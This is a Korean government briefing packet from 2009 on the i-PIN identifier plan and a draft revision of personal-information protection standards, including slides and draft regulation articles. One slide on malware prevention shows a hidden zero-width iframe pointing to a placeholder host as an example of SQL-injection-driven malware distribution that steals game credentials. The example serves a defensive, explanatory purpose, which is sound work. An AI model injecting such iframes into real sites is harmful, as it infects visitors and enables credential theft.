i-pin 정책설명회및 개인정보의기술적 관리적보호조치기준 개정 ( 안 ) 공청회 일시 : 2009년 3월 12일 ( 목 ) 14:00~17:00 장소 : 서울로얄호텔 2층로얄볼룸 주최 : 방송통신위원회 주관 :
진행순서 시간행사내용비고 13:30~14:00 30 접수및등록 14:00~14:10 10 개회및인사말 황철증 네트워크정책관 ( 방송통신위원회 ) 설명회주제발표 14:10~14:50 40 i-pin 활성화종합대책 오상진과장 ( 방송통신위원회 ) 14:50~15:00 10 질의응답 공청회주제발표 15:00~15:40 40 개인정보의기술적 관리적보호조치기준개정 ( 안 ) 의추진방향및주요내용 이강신팀장 (KISA) 15:40~16:00 20 ( 휴식및토론좌석설치 ) 패널토론 사회자 : 정준현교수 ( 단국대학교 ) 토론자 : 염흥열교수 ( 순천향대학교 ) 16:00~16:30 30 윤주희 부위원장 ( 소비자시민의모임전자상거래전문위원회 ) 박나룡 차 장 ( 다음커뮤니케이션 ) 오상진 과 장 ( 방송통신위원회 ) 이강신 팀 장 (KISA) 16:30~16:50 20 질의응답 ( 발표자및토론자전원 ) 16:50~ 정리및폐회패널사회자
< 목차 > < 설명회주제발표 > i-pin 활성화종합대책 1 오상진과장 ( 방송통신위원회 ) < 공청회주제발표 > 개인정보의기술적 관리적보호조치기준개정 ( 안 ) 의 추진방향및주요내용 21 이강신팀장 ( ) [ 첨부 1] 개인정보의기술적 관리적보호조치기준 고시개정 ( 안 ) 49 [ 첨부 2] 개인정보의기술적 관리적보호조치기준 고시대비표 59 [ 첨부 3] 서면질의서 69
< 설명회주제 > 오상진과장 ( 방송통신위원회 ) - 1 -
본자료는검토중인내용으로방송통신위원회최종안과차이가있을수있음을알려드립니다. 인터넷상주민등록번호대체수단 (i-pin) 활성화종합대책 ( 안 ) 2009. 3. 1Ⅰ 2Ⅱ 3Ⅲ 1Ⅳ i-pin 추진배경 i-pin 추진현황및당면과제 비전및추진전략 1 단계추진과제 2Ⅴ 2ᆞ3 단계추진과제 - 3 -
1Ⅰ i-pin 추진배경 1 인터넷상주민등록번호이용의문제점 2 주민번호대체수단활성화필요성 인터넷상주민번호이용의문제점 인터넷상에서실명확인, 성인인증등의수단으로광범위하게사용되어유 ᆞ 노출및명의도용에의한사고가심각 문제점 한번노출시변경 ᆞ 갱신이어렵고, 무한복제가능하므로침해가지속적으로발생 사업자는수집한주민등록번호를이용자 DB 관리, 제휴마케팅등을위해폭넓게활용하고있어이용자의 프라이버시침해우려 - 4 -
인터넷상주민번호이용의문제점 주민등록번호의구조 AAAAAA BCCCCDE 1. AAAAAA : 생년월일 2. B : 성별 3. CCCC : 지역코드 ( 출생신고한곳 ) 4. D : 해당지역접수번호 5. E : 검증번호 주민등록번호는자체가개인정보의집합체이므로유 ᆞ 노출시침해수준이높음 인터넷상주민번호이용의문제점 주민번호침해사례 주민번호등 900 만건의개인정보중국인해커유출 < 08. 7 월 > 주민번호도용국내온라인게임사이트 1,200 백만명계정대량생성 ( 06 년 ) 국내대형쇼핑몰해킹으로 1,081만명개인정보유출 ( 08년) 명의도용, 보이스피싱등 2 차피해우려, 불안감조성 - 5 -
인식별번호인터넷상주민번호이용의문제점 해외개인식별번호현황 미국영국독일일본중국 구분개존재유무 변경가능 사회보장번호 (SSN*) 가능 사회보장번호 (NIN**) 가능 ㅊ 없음 ( 출생, 사망등기록을위한신분등록제는존재 ) 주민표번호 가능 신분증번호 가능 인터넷이용시신원확인 없음 없음없음없음 일부의경우신분증번호요구 *SSN : Social Security Number, **NIN : National Insurance Number 주민번호대체수단활성화필요성 온라인상의주민번호이용의문제점해결 i-pin 기능개선으로안전성및주민등록번호수준의편의성제공 안정성 이용자편의성 변경가능, 추정하기어려움 (ID/PW 방식 ) ㅊ본인확인시단순암기 (Know) 를통해사용가능 사업자편의성 회원관리, 제휴마케팅등이주민번호없이구현가능 주민등록번호대체수단의무화제도시행및사회적인식변화 08 년 5 월정통망법개정을통해주민등록번호를사용하지않는회원가입방법 (i-pin 등 ) 의제공을의무화 ( 정통망법제 23 조 2) 개인정보침해사고대형화 다발화에따라범사회적인식상승 - 6 -
주민번호대체수단활성화필요성 식별수단별기능및편의성비교 실명인증수단 청소년이용 연령구분 온 오프라인연계 중복가입방지 인증방법 사용편의성 주민번호 O O O O 암기 아이핀 O O X O 암기 아이핀 2.0 O O O O 암기 휴대폰인증 X X 소지 공인인증서인증 X X 소지 + 암기 신용카드인증 X X X X 소지 + 암기 대면확인 O O X X - 주민번호대체수단활성화필요성 인터넷상의주민번호대체수단필요성 정부주도의 개인인증체계 소비자주도의 관리체계 주민등록번호 ( 고정 / 불변 ) i-pin ( 변경가능 / 선택가능 ) - 7 -
2Ⅱ i-pin 추진현황및당면과제 1 추진경과및도입현황 2 당면과제 : i-pin 활성화저해요인 i-pin 추진경과및도입현황 i-pin 추진경과 05. 10월 : 본인확인기관별 i-pin 서비스개시 08. 6월 : 주민등록번호대체수단제공을의무화한정보통신망법개정 08. 8월 : 행안부공공 i-pin 서비스개시및민간 i-pin과연계 09. 1월 : 주민등록번호대체수단의무제공사업자기준시행령공표 민간분야 i-pin 도입현황 아이핀도입사이트 아이핀발급건수 190 230 636,929 773,589 23 85 ( 단위 : 개 ) 17,193 98,791 ( 단위 : 건 ) 2006 2007 2008 2009.1 월 2006 2007 2008 2009.1 월 의무도입 ( 08. 12) 이전도입사이트수미약 08 년 클린캠페인 을통해발급건수대폭증가 - 8 -
당면과제 : i-pin 활성화저해요인 i-pin 도입으로서비스기능제한 온라인연계서비스제한 식별자 (DI) 가웹사이트별로상이하여사이트간연계된서비스제휴에사용불가 < A 사이트 > < B 사이트 > < C 사이트 > DI(A) = MC0Gqx3 E43li=] DI(B) = [GA0Gqx3 E43li=] 780417-1XXXXXX 중복가입확인정보 (DI) 연계불가 연계불가 1) DI : Duplication Information 2) 의미 : 이용자가해당웹사이트에이미가입되어있는지를확인하는정보 < i-pin 가입 > < i-pin 가입 > < 이용자 > < 주민번호가입 > 3) 생성방법 : 주민등록번호 + 웹사이트코드 + 비밀키로암호화 4) 문제점 : 웹사이트별로 DI 값이상이함 오프라인가입자이용불편 오프라인에서주민번호를통해가입한회원에게온라인서비스제공하기어려움 당면과제 : i-pin 활성화저해요인 i-pin 사용의불편함 이용자의경우 i-pin 이용이주민번호에비해불편 ( 사용불편 ) i-pin 사용시발급받은본인확인기관을기억해야함 ( 기존가입 ) 주민번호로가입한사이트에 i-pin 으로전환해야함 1 2 Where? What? 본인확인기관에대한불신 본인확인기관의안정적인서비스제공에대한법제도적관리근거미약 인터넷에서주민번호를완전히대체하기위해 i-pin 체계개선필요 - 9 -
3Ⅲ 비전및추진전략 비전및추진전략 비전 - 인터넷개인인증인프라혁신 - i-pin 활성화를통한그린인터넷환경구현 추진전략 1 단계 : 09~11 년 i-pin 제도조기정착과 이용보편화를위한인프라구축 i-pin 확산기반조성 2 단계 : 12~13 년 조세 금융을제외한민간의모든온라인서비스에아이핀적용 i-pin 이용확산 도입사이트수 : 10,000 개 발급건수 : 2,000 만건 3 단계 : 14~15 년 주민번호없는인터넷환경조성 i-pin 전면확산 도입사이트수 : 50,000 개 발급건수 : 3,000 만건 도입사이트수 : 3,000 개 발급건수 : 1,000 만건 - 10 -
비전및추진전략 단계별추진목표 1 단계 i-pin 2.0 을통한편의성향상 타사이트간제휴서비스가능정보제공 오프라인서비스와의연계 i-pin ID 통합관리 i-pin 확산기반조성 i-pin 제도활성화 사업자공시및이행점검 기존회원 i-pin 전환사업 초 중 고생편리한 i-pin 이용 홍보및인식제고 i-pin 법제도정비 본인확인기관법적근거마련 본인확인기관정기점검강화 2 단계 i-pin 이용확산 i-pin 도입기준완화를통한도입사업자확대 i-pin 의국가정보화전략화추진 3 단계 i-pin 전면확산 조세 금융분야의 i-pin 적용방안연구및시스템구축 주민번호이용전면금지에대한법제화검토 1Ⅳ 1 단계추진과제 1 편의성향상을위한 i-pin 2.0 구현 2 i-pin 이용확산촉진 2 i-pin 안정성확보를위한법제도개선 - 11 -
1 단계추진과제개요 (1/2) 기존 i-pin 구조를개선한 i-pin2.0 서비스구축 제휴서비스, 연계서비스등을위한공동의식별자인연계정보 (CI) 생성 i-pin 계정 (ID) 통합관리시스템개발 주민등록번호로가입한기존이용자 i-pin 전환및인식제고 i-pin 본인확인기관에대한관리강화, i-pin 확산을위한법제도연구추진 목표연도 i-pin 2009 년 2010 년 2011 년 도입사이트수 700 개 1,500 개 3,000 개 발급건수 200 만건 500 만건 1,000 만건 1 단계추진과제개요 (2/2) i-pin 도입사업자공시및이행점검 조세 금융분야 i-pin 적용연구 i-pin 에대한홍보및인식제고 기존회원의 i-pin 전환사업 초 중 고교생의편리한 i-pin 이용 i-pin 이용확산 법제도정비 i-pin 이용기반조성 본인확인기관신뢰도향상 홍보인식강화 이용자편의성향상 (i-pin 2.0) 본인확인기관의법적근거마련 본인확인기관정기점검강화 타사이트간제휴서비스 i-pin 아이디통합관리 오프라인서비스와의연계 - 12 -
1. 편의성향상을위한 i-pin2.0 구현 1-1. 온라인간서비스연계 웹사이트간이용자구별가능한연계정보 (CI: Connecting Information) 를웹사이트에제공 - 주민등록번호를통해가입한회원의주민등록번호를연계정보 (CI) 로 변환할수있는모듈개발ㆍ제공 본인확인기관 본인확인기관 DI 전달 DI 전달 CI 전달 CI 전달 연계불가 연계가능 i-pin 도입사이트 [MC0Gqx3 E43li=] i-pin 도입사이트 [PFC2hg df2io=] i-pin 도입사이트 [MC0Gqx3 E43li=] i-pin 도입사이트 [MC0Gqx3 E43li=] 1. 편의성향상을위한 i-pin2.0 구현 1-2. 온 ᆞ 오프라인서비스연계 오프라인에서주민번호를입력하면즉각연계정보 (CI) 를생성, 온라인상의 CI 와비교할수있도록모듈개발 ᆞ 제공 - 오프라인에서주민번호로가입한회원 DB 에연계정보를생성 ᆞ 보관하여, 온라인서비스시동일인물여부확인 온라인 (On-line) On-line 티켓예매 <i-pin 도입사이트 > 연계정보 (CI) 생성모듈 주민번호입력 비밀정보주민 CI 생성번호모듈암호화 ( 해쉬 ) 연계정보 (CI) 생성 오프라인 (Off-line) 이용자주민번호입력 CI 변환모듈이용이용자확인 Off-line 티켓수령 - 13 -
1. 편의성향상을위한 i-pin2.0 구현 1-3. i-pin 계정 (ID) 통합관리 이용자가 i-pin ID 입력시시스템에서자동으로발급기관을식별하도록하여이용자편의성제고 - KISA에 신뢰게이트웨이 (TG) 를구축하여 ID 중복등록방지 TG (Trust Gateway) : i-pin ID의중복발급을방지하기위해사전에검증하는시스템 Where? Auto 1 2 What? 1 < 통합 ID G/W> 1. 편의성향상을위한 i-pin2.0 구현 1-4. 성명추가입력을통해 i-pin 보안성강화 기존 ID/PW 이외, 이용자성명을입력하도록하여 ID/PW 유출에따른 i-pin 도용방지 < 본인확인기관인증절차 > Step 1 [1차인증 ] : ID + 패스워드입력 성명 Step 2 [2 차인증 ] : i-pin 발급자성명과입력된성명확인 Step 3 [ 인증완료 ] 1-5. 다양한웹브라우저에서 i-pin 발급가능 MS 사의 IE 이외모든웹브라우저에서도 i-pin 사용가능하도록공인인증서 ᆞ 키보드보안모듈을개선하여 i-pin 에적용 웹브라우저점유율 : IE(MS) > Firefox(Mozila) > Safari(MAC) > Chrome(goole) > Opera - 14 -
[ 참고 ] i-pin 개선전 이용 i-pin 이용자 < 본인확인기관에 ID/PW 입력 > 가입 본인확인기관 < 전달정보 > 1 DI= 암호화 ( 주민번호 + 사이트식별번호 ) 2 이름 3 i-pin 4 성별 5 생년월일 ( 나이 ) 6 내 / 외국인정보 i-pin 도입사이트 이름 i-pin 성별생년월일내 / 외국인정보 DI 본인확인에이용청소년등급등서비스활용중복체크 발급 < 제공정보 > 주민번호 성명 이메일 본인확인기관별 ID 중복체크 < 단점 > 이용시본인확인기관기억필요 아이핀발급창화면구성복잡 [ 참고 ] i-pin 개선후 이용 i-pin 이용자 < 본인확인기관에 ID/PW 입력 > < 전달정보 > 1 DI= 암호화 ( 주민번호 + 사이트식별번호 ) DI 예시 ) 64byte = [PFC2hg df2io=] 2 CI= 암호화 ( 주민번호 +KISA제공정보 ) CI 예시 ) 64byte = [MC0Gqx3 E43li=] 본인확인기관 3이름 4 i-pin 5성별 6 생년월일 ( 나이 ) 7내 / 외국인정보 8 발급기관명 CI를이용하여사이트간 이용자동일인확인후 마일리지사용 제휴서비스활용가능 예 ) OK캐쉬백등 i-pin 도입사이트 제휴사이트 이름 i-pin 성별 생년월일 내 / 외국인정보 DI CI 본인확인에이용 청소년등급등서비스활용 중복체크 사이트간 이용자연계 발급 < 제공정보 > 주민번호 성명 이메일 신뢰게이트웨이이용한고유 ID 발급 < 장점 > 이용시본인확인기관기억불필요 아이핀발급창화면구성단순 - 15 -
2. i-pin 이용확산촉진 2-1. i-pin 도입사업자공시및이행점검 일평균이용자수기준을충족하는사업자선정ᆞ공시 i-pin 조기도입유도를위한사업자지원방안마련 - i-pin 정책방향, i-pin 도입절차안내등설명회개최 - 사업자기술컨설팅지원대상사업자공시후분기별 i-pin 도입여부이행점검및행정지도 09 년추진프로세스및일정 대상사업자공시 (4 월 ) 정책설명회개최 (5 월, 6 월 ) 이행점검 (7 월, 10 월, 12 월 ) 행정지도 (10.1 월 ) 2. i-pin 이용확산촉진 2-2. 기존회원 i-pin 전환사업 기존주민번호이용회원이 i-pin 사용시사업자DB에서주민번호자동삭제할수있는사업자시스템개선필요대상사업자 : 주민번호를 i-pin으로대체할의사가있는사업자지원내용 : i-pin 전환시스템도입및주민번호기반의관리체계변경비용이용방법 : 이용자가 i-pin으로본인확인후전환신청하면, 사업자는주민번호삭제이용자자발적참여유도를위해홍보ᆞ경품이벤트추진 < 전환사업 3개년계획 > 구분 2009년 2010년 2011년지원사업자수 200개사업자 100개사업자 100개사업자소요예산 105억원 50억원 50억원 예산확보여부에따라계획일부변경가능 - 16 -
2. i-pin 이용확산촉진 2-3. 초중고교생의편리한 i-pin 이용 초 ᆞ 중 ᆞ 고등학생을대상으로 i-pin 발급및이용방법교육 포털 ᆞ 게임사이트와 부모님과함께하는 i-pin 발급 ( 가칭 ) 추진 초 ᆞ 중 ᆞ 고등학생이복잡한신원확인없이쉽게 i-pin 을발급받을수있도록초 ᆞ 중 ᆞ 고교전용 i-pin 발급프로세스구축 2 신원보증인확인 1 신원확인 4 i-pin 이용 ( 대면확인 ) 3 i-pin 발급 < 본인확인기관 > < 담당교사 > < 학생 > < 학교 > < 웹사이트 > 2-4. i-pin 홍보강화를통한인식제고 TV 등공중파광고추진 ( 09 년상반기 ) 포털사업자등과 i-pin 활성화를위한캠페인전개 ( 09 년하반기 ) 3. i-pin 안전성확보를위한법제도개선 3-1. 본인확인기관법적근거마련및정기점검 본인확인기관의지정 운영에관한법적근거마련 - 정보통신망법개정을통해본인확인기관의지정근거, 본인확인업무의휴지 폐지에관한사항등에관한규정신설 본인확인기관의개인정보유출 남용등침해위험을사전에차단하기위하여본인확인기관에대한정기점검강화 - i-pin 도입사업자가관리소홀로 i-pin 정보등을노출하지않도록, i-pin 신규도입시및수시점검실시 - 17 -
3. i-pin 안전성확보를위한법제도개선 3-2. 금융조세분야등의 i-pin 적응을위한법제도연구 온라인구매후현금영수증발급할때주민등록번호외에휴대폰, 카드 번호등을선택할수있도록국세청협의추진 주민등록번호의수집 이용이필요한조세관련법령 서식및금융분야의 제도등에대한개선방안연구 30 3. i-pin 안전성확보를위한법제도개선 조세신고관련주민등록번호활용현황 근거법령내용필수비고 법제 33 조 옥션 G 마켓등마켓플레이스의경우판매자정보 ( 사업자등록증이없는개인 ) 를세무서에제출 수집제출 부가가치세법 법제 17 조의 2 대손세액공제 ( 변제 ) 신고서에주민등록번호를기재하여관할세무서장에제출 x 수집 시행령제 53 조사업자등록증이없는자의세금계산서발부 수집 소득세법 법제 164 조지급명세서제출시기타소득자주민등록번호기재 수집 시행령제 193 조 원천징수영수증교부시기타소득발생실지명의확인 이벤트당첨자에해당 실명확인 법인세법법제116조환불등사유로고객계좌정보필요할경우 (5년) 세금계산서등으로보관 x 수집보관 - 18 -
2Ⅴ 2ᆞ3 단계추진과제 1 1 단계사업의기대효과 ( 11 년말 ) 2 2ᆞ3 단계추진과제 1 단계사업의기대효과 ( 11 년말 ) i-pin 확산기반조성 일반적인인터넷환경에서의주민등록번호없이 i-pin 으로 편리하고안전한본인인증이가능한기반완성 3,000 개웹사이트도입및 1,000 만건발급사용 조세ㆍ금융을제외한모든온라인서비스에적용하기위한여건확보 - 19 -
2~3 단계추진과제 2 단계 추진과제 모든민간웹사이트로 i-pin 적용대상을확대 조세 금융을제외한모든온라인서비스에 i-pin 적용 i-pin 이용확산 공공서비스기반시스템의단계적개선추진 국가정보화기본계획에반영추진 3 단계 추진과제 i-pin 전면확산 주민번호없는인터넷환경조성 조세업무및금융거래프로세스에 i-pin 을적용할수있도록관련시스템변경 구축 행정적목적이외의주민등록번호사용금지법제화추진 ( 참고 ) 추진일정 i-pin ID 통합관리 타사이트간제휴서비스가능정보 오프라인서비스와연계 서비스확대 소수자의 i-pin 이용편의성제공 i-pin 도입사업자공시및점검 기존회원 i-pin 전환사업 대상사업자공시 이행점검 초중고생의편리한 i-pin 이용 i-pin 에대한홍보및인식제고 교재개발 시범사업 본인확인기관법적근거마련 본인확인기관정기점검강화 자동점검도구개발 2009 년 2010 년 2011 년 1/4 분기 2/4 분기 3/4 분기 4/4 분기 - 20 -
< 공청회주제 > 이강신팀장 ( ) - 21 -
개인정보의기술적 관리적보호조치기준 개정 [ 안 ] 의추진방향및주요내용 목차 I 추진방향 II 주요내용 - 23 -
추진방향 개인정보의보호조치기준의법적근거 (1/2) 제 76 조 제 73 조 제 71 조 - 24 -
개인정보의보호조치기준의법적근거 (2/2) 적용대상 (1/2) - 25 -
적용대상 (2/2) 적용대상사업자 비고 정보통신망법적용사업자 기간ㆍ별정통신사업자 준용사업자 기간통신 - 별정통신 - 여행업, 호텔업, 항공운송사업, 학원, 교습소, 휴양콘도미니엄, - 할인점, 백화점, 쇼핑센터, 체인사업 주택건설사업, 주택관리업, 건설기계대여ㆍ매매ㆍ정비ㆍ폐기업, 부동산중개업, 자동차매매업, 자동차대여사업, 결혼중개업, 의료기관, 직업소개소, 정유사, 체육시설업, 비디오대여점, 서점, 영화관 09.7 월적용 기타인터넷사업자포털, 게임, 쇼핑등 - 추진방향 - 26 -
개인정보침해사례 관리자에의한오남용 (1) 개인정보침해사례 관리자에의한오남용 (2) - 27 -
개인정보침해사례 기술적조치미흡 (1) OO 청 주민등록번호 성 명 710*** - ******* 홍길동 클릭 주민등록번호만으로외부인이인터넷을통해 개인정보 DB 접근가능 개인정보처리시스템 개인정보침해사례 기술적조치미흡 (2) - 28 -
추진방향 추진방향 (1) - 29 -
추진방향 (2) 추진방향 (3) - 30 -
추진방향 (4) 공격자 개인정보취급자 개인정보보호조직 출력ㆍ복사물개인정보취급자 이용자 DB 이용자 전송구간 서버 개인정보처리시스템 주요내용 - 31 -
정의 (1) 정의 (2) - 32 -
정의 (3) 정의 (4) - 33 -
정의 (5) 주요내용 - 34 -
내부관리계획의수립 시행 (1) 내부관리계획의수립 시행 (2) - 35 -
내부관리계획의수립 시행 (3) 개인정보보호조직 개인정보관리책임자 (CPO) 지정개인정보취급자지정담당자별업무및임무지정 개인정보취급자교육교육계획수립및년 2 회이상시행 ( 신설 ) 보호조치세부사항 기타 접근통제, 접속기록위ㆍ변조방지개인정보의암호화 ( 주민번호, 계좌등금융정보 ) 악성프로그램침투방지, 출력ㆍ복사시보호조치개인정보표시제한보호조치 ( 신설 ) 등 보안서약서작성, 임직원인식제고개인정보노출방지대책등 내부관리계획의수립 시행 (4) - 36 -
주요내용 접근통제 (1) - 37 -
접근통제 (2) 접근통제 (3) - 38 -
접근통제 (4) 접근통제 (5) 입력문자 7자리 8자리 9자리 10자리 영문소문자 (26문자) 13분 5.8시간 6.3일 163일 영문소문자 + 숫자 (36문자) 2시간 78시간 118일 4년 영문대ㆍ소문자 + 숫자 (62문자) 25일 4년6개월 - - 영문대ㆍ소문자, 숫자, 특수 (94문자) 437일 114년 - - - 39 -
접근통제 (6) 구분 Firewall IDS IPS UTM 목적패킷필터링침입탐지 기능 장점 단점 패킷분석패스여부결정허용포트관리 구현용이관리용이 웜, 바이러스등차단불가 데이터수집데이터분석관리자보고단순대응 내부침입감지 24 시간감시 소극적대응방안부족, 전문가필요 침입탐지 / 방지및대응분석, 예측실시간대응실시간보고공격패턴관리 알려지지않은침입감지및실시간대응 고비용운용 / 관리어려움전문가필요 통합위협관리 Firewall, VPN, IDS, IPS, Virus Wall, 웹필터링, NAC 도입비용절감보안기능통합보다쉬운운용 / 관리 고성능의 H/W 필요 주요내용 - 40 -
접속기록의위ㆍ변조방지 (1) 접속기록의위ㆍ변조방지 (2) - 41 -
접속기록의위ㆍ변조방지 (3) 접속기록의위ㆍ변조방지 (4) 고객 DATA 개인정보조회이력 DATA 접근사실 DATA 긴급 Backup DISK 를이용한 재해복구대응 Backup TAPE 소산을통한 다년간보관 - 42 -
주요내용 개인정보의암호화 (1) - 43 -
개인정보의암호화 (2) 개인정보의암호화 (3) HASH e5 10 34 8a 3b d3 44 8d f4 a0 04 53 3f 35 76 37 e5 16 c6 fa 주민등록번호, 계좌번호등암호화 비밀번호, 바이오정보일방향암호화 개인정보의암호화 보안서버구축 개인정보의 PC 저장시암호화 - 44 -
개인정보의암호화 (4) 암호화알고리듬 처리량 [Mb/sec] Cycle/byte 13 자리암호화개수 ( 개 /sec) DES(56bit Key) 272 51.1 9,072,734 AES/CBC(128bit Key) 672 20.9 15,234,609 암호화알고리듬 처리량 [Mb/sec] Cycle/byte 13 자리암호화개수 ( 개 /sec) AES-128 1137.7 16.9 8,888,281 SEED-128 372.8 51.5 2,912,000 주요내용 - 45 -
악성프로그램방지 악성프로그램방지 <iframe src ="http://www.xxx.xx/icyfox.htm" name ="A" width="0" frameborder="0" > 2. Insert Iframe 1.Web hacking (SQL Injection) 공격도구 < 악성코드경유지 ( 국내유명포털등 )> < 악성코드유포지 ( 해외또는국내 )> 4. Malicious Code Infected 3. Visit Web Site 5. Game ID/PW - 46 -
주요내용 개인정보표시제한보호조치 - 47 -
개인정보표시제한보호조치 Q & A - 48 -
[ 첨부 1] - 49 -
방송통신위원회고시제호정보통신망이용촉진및정보보호등에관한법률시행령제15 조제 6항에따라개인정보의기술적 관리적보호조치기준을다음과같이고시합니다. 년월일방송통신위원회위원장 개인정보의기술적 관리적보호조치기준 제1 조 ( 목적 ) 이기준은 정보통신망이용촉진및정보보호등에관한법률 ( 이하 법 이라한다 ) 제28조제1 항및동법시행령제15조제6 항의규정에의하여정보통신서비스제공자등이이용자의개인정보를취급함에있어서개인정보가분실 도난 누출 변조 훼손등이되지아니하도록안전성을확보하기위하여취하여야하는기술적 관리적보호조치의구체적인기준을정하는것을목적으로한다. 제2 조 ( 정의 ) 이기준에서사용하는용어의뜻은다음과같다. 1. 개인정보관리책임자 라함은정보통신서비스제공자의사업장내에서이용자의개인정보보호업무를총괄하거나업무처리를최종결정하는임직원을말한다. 2. 개인정보취급자 라함은개인정보보호를위한기술적 관리적보호조치를실제구현운영하거나, 업무상개인정보취급이불가피한 - 51 -
자를 말한다. 3. 개인정보처리시스템 이라 함은 개인정보를 처리할 수 있도록 체 계적으로 구성한 시스템을 말한다. 4. 비밀번호 라 함은 이용자 및 개인정보취급자 등이 시스템 또는 정보통신망에 접속할 때 식별자와 함께 입력하여 정당한 접속 권한 을 가진 자라는 것을 식별할 수 있도록 시스템에 전달해야 하는 고 유의 문자열로서 타인에게 공개되지 않는 정보를 말한다. 5. 접속기록 이라 함은 이용자 또는 개인정보취급자 등이 개인정보 처리시스템에 접속하여 수행한 내역에 대하여 식별자, 접속일시, 접 속지를 알 수 있는 정보 등 접속한 사실을 전자적으로 기록한 것을 말한다. 6. 바이오정보 라 함은 지문 얼굴 홍채 정맥 음성 필적 등 개인을 식별할 수 있는 신체적 또는 행동적 특징에 관한 정보로서 그로부터 가공되거나 생성된 정보를 포함한다. 7. P2P(Peer to Peer) 라 함은 정보통신망을 통해 서버의 도움 없이 개인과 개인이 직접 연결되어 파일을 공유하는 것을 말한다. 8. 공유설정 이라 함은 컴퓨터 소유자의 파일을 타인이 조회 변경 복 사 등을 할 수 있도록 설정하는 것을 말한다. 9. 보안서버 라 함은 정보통신망에서 이용자 개인컴퓨터와 웹서버 사이에 송수신되는 정보를 암호화하여 전송하는 서버를 말한다. 10. SSL(Secure Socket Layer) 라 함은 데이터를 송수신하는 두 종 - 52 -
단 간에 인증, 암호화, 무결성을 보장하는 업계 표준 통신규약을 말 한다. 11. 인증정보 라 함은 개인정보처리시스템 또는 정보통신망을 관리 하는 시스템 등이 요구한 식별자의 신원을 검증하는데 사용되는 정 보를 말한다. 제3 조 ( 내부관리계획의 수립 시행 ) 1개인정보 보호 조직의 구성 및 운영 은 다음 각호의 사항을 포함하여야 한다. 1. 개인정보관리책임자의 자격요건 및 지정에 관한 사항 2. 개인정보관리책임자와 개인정보취급자의 역할 및 책임에 관한 사 항 3. 개인정보 내부관리계획의 수립 및 승인에 관한 사항 4. 개인정보의 기술적 관리적 보호조치 이행 여부의 내부 점검에 관한 사항 5. 그 밖에 개인정보보호를 위해 필요한 사항 2정보통신서비스제공자등은 다음 각 호의 사항을 포함하는 개인정보보 호 교육 계획을 수립하여 개인정보관리책임자 및 개인정보취급자를 대상 으로 매년 2회 이상 교육을 실시하여야 한다. 1. 교육목적 및 대상 2. 교육 내용 3. 교육 일정 및 방법 3정보통신서비스제공자등은 제4 조에서 제8 조까지의 보호조치 이행을 - 53 -
위한 세부적인 추진방안을 마련하여야 한다. 제4 조 ( 접근통제 ) 1정보통신서비스제공자등은 개인정보처리시스템에 대 한 접근권한을 서비스 제공을 위하여 필요한 개인정보관리책임자 또는 개인정보취급자에게만 부여한다. 2정보통신서비스제공자등은 전보 또는 퇴직 등 인사이동이 발생하여 개인정보취급자가 변경되었을 경우 지체 없이 개인정보처리시스템의 접근권한을 변경 또는 말소한다. 3정보통신서비스제공자등은 제1 항 및 제2 항에 의한 권한 부여, 변경 또는 말소에 대한 내역을 기록하고, 그 기록을 최소 5년간 보관한다. 4정보통신서비스제공자등은 개인정보취급자가 정보통신망을 통해 외 부에서 개인정보처리시스템에 접속이 필요한 경우에는 공인인증서 등 안전한 인증 수단을 적용하여야 한다. 5정보통신서비스제공자등은 정보통신망을 통한 불법적인 접근 및 침해 사고방지를 위해 다음 각 호의 기능을 포함한 시스템을 설치 운영하여야 한다. 1. 개인정보처리시스템에 대한 접속 권한을 IP주소 등으로 제한하여 인가 받지 않은 접근을 제한 2. 개인정보처리시스템에 접속한 IP 등을 재분석하여 불법적인 개인정보 유출 시도를 탐지 6정보통신서비스제공자등은 이용자가 안전한 비밀번호를 이용할 수 있도록 비밀번호 작성규칙을 수립하고, 이행한다. 7정보통신서비스제공자등은 개인정보취급자를 대상으로 다음 각 호의 - 54 -
사항을 포함하는 비밀번호 작성규칙을 수립하고, 이를 적용 운용하여야 한다. 1. 다음 각 목의 문자 종류 중 2종류 이상을 조합하여 최소 10 자리 이상 또는 3종류 이상을 조합하여 최소 8자리 이상의 길이로 구성 가. 영문 대문자 (26개) 나. 영문 소문자 (26개) 다. 숫자 (10개) 라. 특수문자 (32개) 2. 연속적인 숫자나 생일, 전화번호 등 추측하기 쉬운 숫자는 사용 불가 3. 비밀번호에 유효기간을 설정하여 반기별 1회 이상 변경 8정보통신서비스제공자등은 취급중인 개인정보가 인터넷 홈페이지, P2P, 공유설정 등을 통하여 열람권한이 없는 자에게 공개되거나 외부에 유출되지 않도록 개인정보처리시스템 및 개인정보취급자의 컴퓨터에 조치를 취하여야 한다. 제5 조 ( 접속기록의 위 변조방지 ) 1정보통신서비스제공자등은 개인정보 취급자가 개인정보처리시스템에 접속한 기록을 월 1회 이상 정기적으로 확인 감독하여야 하며, 시스템 이상 유무의 확인 등을 위해 최소 6개월 이상 접속기록을 보존 관리하여야 한다. 2 단, 제1 항의 규정에도 불구하고 전기통신사업법 제5 조의 규정에 따른 기간통신사업자의 경우에는 보존 관리해야할 최소 기간을 5년으로 한다. - 55 -
3정보통신서비스제공자등은개인정보취급자의접속기록이위 변조되지않도록별도의물리적인저장장치에보관하여야하며정기적인백업을수행하여야한다. 제6 조 ( 개인정보의암호화 ) 1정보통신서비스제공자등은비밀번호및바이오정보는복호화되지아니하도록일방향암호화하여저장한다. 2정보통신서비스제공자등은주민등록번호, 신용카드번호및계좌번호에대해서는안전한암호알고리듬으로암호화하여저장한다. 3 정보통신서비스제공자등은정보통신망을통해이용자의개인정보및인증정보를송 수신할때는다음각호중하나의방식을갖춘안전한보안서버를구축 운영하여야한다. 1. 웹서버에 SSL(Secure Socket Layer) 인증서를설치하여개인정보및인증정보를암호화하여송 수신하는기능 2. 웹서버에암호화응용프로그램을설치하여개인정보및인증정보를암호화하여송 수신하는기능 4정보통신서비스제공자등은이용자의개인정보를개인용컴퓨터 (PC) 에저장할때에는이를암호화해야한다. 제7 조 ( 악성프로그램방지 ) 정보통신서비스제공자등은백신소프트웨어를월 1회이상주기적으로갱신 점검하고, 악성프로그램관련경보가발령된경우및백신소프트웨어또는운영체제제작업체에서업데이트공지가있는경우에는최신소프트웨어로갱신 점검하여야한다. 제8 조 ( 출력 복사시보호조치 ) 1정보통신서비스제공자등은개인정보 - 56 -
